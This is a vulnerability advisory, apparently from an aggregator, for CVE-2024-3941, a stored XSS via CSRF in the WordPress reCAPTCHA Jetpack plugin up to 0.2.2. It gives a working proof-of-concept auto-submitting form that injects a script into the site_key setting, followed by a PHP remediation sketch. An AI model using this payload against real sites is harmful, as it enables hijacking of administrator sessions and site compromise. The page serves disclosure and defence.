reCAPTCHA Jetpack 0.2.2 XSS CSR
Title | Published | Family |
---|---|---|
WordPress reCAPTCHA Jetpack Plugin <= 0.2.2 is vulnerable to Cross Site Request Forgery (CSRF) | 15 May 2024 00:00 | patchstack |
CVE-2024-3941 reCAPTCHA Jetpack <= 0.2.2 - Stored XSS via CSRF | 10 May 2024 06:00 | vulnrichment |
CVE-2024-3941 reCAPTCHA Jetpack <= 0.2.2 - Stored XSS via CSRF | 10 May 2024 06:00 | cvelist |
CVE-2024-3941 | 14 May 2024 15:42 | nvd |
reCAPTCHA Jetpack <= 0.2.2 - Stored XSS via CSRF | 19 Apr 2024 00:00 | wpvulndb |
CVE-2024-3941 | 14 May 2024 15:42 | cve |
Wordfence Intelligence Weekly WordPress Vulnerability Report (April 15, 2024 to April 21, 2024) | 25 Apr 2024 15:56 | wordfence |
This requires Jetpack to be installed and to have a page/post with a Jetpack Contact Form.
Add a post/page containing a Jetpack Contact Form shortcode:
```
[contact-form][contact-field label="Name" type="name" required="true" /][contact-field label="Email" type="email" required="true" /][contact-field label="Message" type="textarea" /][/contact-form]
```
Once there is a form using Jetpack, have a logged-in admin open an HTML document containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=recaptcha-jetpack" method="post">
<input type="hidden" name="site_key" value='"><script>alert(4)</script>' />
<input type="hidden" name="secret_key" value='csrf2222' />
<input type="hidden" name="recaptcha_type" value="v2" />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" name="enter" id="enter" value="Submit">
</form>
</body>
```
View the post/page containing the form to see the XSS.
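The page does not show the plugin's source, so the following is an added sketch (not the plugin's or the reporter's code) of the two controls the PoC depends on being absent: a nonce check on the settings POST and escaping of the stored `site_key` on output. The `rcj_*` function and option names, the key character set and the `v3` type value are assumptions; the field names and the `recaptcha-jetpack` page slug come from the PoC above.

```php
<?php
// Added example. The rcj_* function and option names are hypothetical.

function rcj_clean_key( $field ) {
    $raw = isset( $_POST[ $field ] ) ? sanitize_text_field( wp_unslash( $_POST[ $field ] ) ) : '';
    // Assumption: reCAPTCHA keys contain only letters, digits, "-" and "_".
    return preg_match( '/^[A-Za-z0-9_-]+$/', $raw ) ? $raw : '';
}

function rcj_save_settings() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Dies unless the POST carries a valid nonce for this user and action;
    // an auto-submitting form hosted on another origin cannot supply one.
    check_admin_referer( 'rcj_save', 'rcj_nonce' );

    $type = isset( $_POST['recaptcha_type'] ) ? sanitize_key( wp_unslash( $_POST['recaptcha_type'] ) ) : '';
    update_option( 'rcj_site_key', rcj_clean_key( 'site_key' ) );
    update_option( 'rcj_secret_key', rcj_clean_key( 'secret_key' ) );
    // Allow-list the type; 'v3' is an assumed second value.
    update_option( 'rcj_type', in_array( $type, array( 'v2', 'v3' ), true ) ? $type : 'v2' );
}

function rcj_render_settings() {
    if ( 'POST' === $_SERVER['REQUEST_METHOD'] ) {
        rcj_save_settings();
    }
    ?>
    <form method="post">
        <?php wp_nonce_field( 'rcj_save', 'rcj_nonce' ); ?>
        <input type="text" name="site_key" value="<?php echo esc_attr( get_option( 'rcj_site_key', '' ) ); ?>" />
        <input type="text" name="secret_key" value="<?php echo esc_attr( get_option( 'rcj_secret_key', '' ) ); ?>" />
        <input type="hidden" name="recaptcha_type" value="<?php echo esc_attr( get_option( 'rcj_type', 'v2' ) ); ?>" />
        <?php submit_button(); ?>
    </form>
    <?php
}

// Front-end markup placed in the contact form: escape on output as well, so a
// value stored before the fix cannot break out of the attribute.
function rcj_widget_html() {
    return '<div class="g-recaptcha" data-sitekey="' . esc_attr( get_option( 'rcj_site_key', '' ) ) . '"></div>';
}

add_action( 'admin_menu', function () {
    add_options_page( 'reCAPTCHA Jetpack', 'reCAPTCHA Jetpack', 'manage_options', 'recaptcha-jetpack', 'rcj_render_settings' );
} );
```

With the nonce check in place the PoC form is rejected before any option is written, and the `esc_attr()` calls neutralize a payload that was stored while the site was still running a vulnerable version.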